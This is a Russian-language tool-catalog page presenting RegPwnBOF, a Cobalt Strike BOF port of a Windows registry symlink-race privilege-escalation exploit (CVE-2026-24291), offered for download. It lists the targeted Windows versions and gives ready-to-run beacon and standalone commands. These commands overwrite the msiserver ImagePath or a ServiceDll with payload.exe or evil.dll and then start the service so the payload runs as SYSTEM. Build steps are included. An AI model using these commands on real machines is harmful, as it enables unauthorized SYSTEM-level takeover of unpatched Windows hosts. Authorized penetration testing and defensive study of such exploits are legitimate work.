Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RegPwnBOF — Буферное переполнение RegPwn от MDSec | Kitploit
Инструменты/GitHubGitHub/flangvik/regpwnbof
Повышение привилегийЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubflangvik/regpwnbof

RegPwnBOF

Буферное переполнение RegPwn от MDSec

Репозиторий
1271025 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RegPwn BOF

Порт Cobalt Strike BOF эксплойта RegPwn от Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.

Это неаккуратная реимплементация BOF оригинального эксплойта на C#. Вся заслуга в исследовании уязвимости и эксплойте принадлежит Filip Dragovic и MDSec.

  • Статья в блоге: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • Оригинальный репозиторий: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

Что делает

Эксплуатирует состояние гонки симлинков реестра в механизме Windows Accessibility ATConfig для записи произвольных значений в защищенные ключи реестра HKLM из контекста обычного пользователя (локальное повышение привилегий).

Целевые системы: Windows 11 25H2/24H2, Windows 10 21H2 и Windows Server 2016/2019/2022 до мартовского обновления 2026 года.

ПРЕДУПРЕЖДЕНИЕ: Этот эксплойт блокирует рабочую станцию как часть состояния гонки.

Цель по умолчанию

Служба msiserver (установщик Windows) с параметром ImagePath. Эта служба работает как SYSTEM и может быть запущена обычными пользователями.

Использование

Cobalt Strike

Загрузите regpwn.cna в Script Manager, затем:

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

Автономный тест

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

После успешного выполнения эксплойта запустите службу для выполнения от имени SYSTEM:

root@kitploit:~
net start msiserver

Сборка

Требуется x86_64-w64-mingw32-gcc (кросс-компилятор MinGW-w64).

root@kitploit:~
make        # сборка BOF (regpwn.x64.o)
make test   # сборка автономного EXE (regpwn.x64.exe)
make clean

Только x64.

Скачать инструмент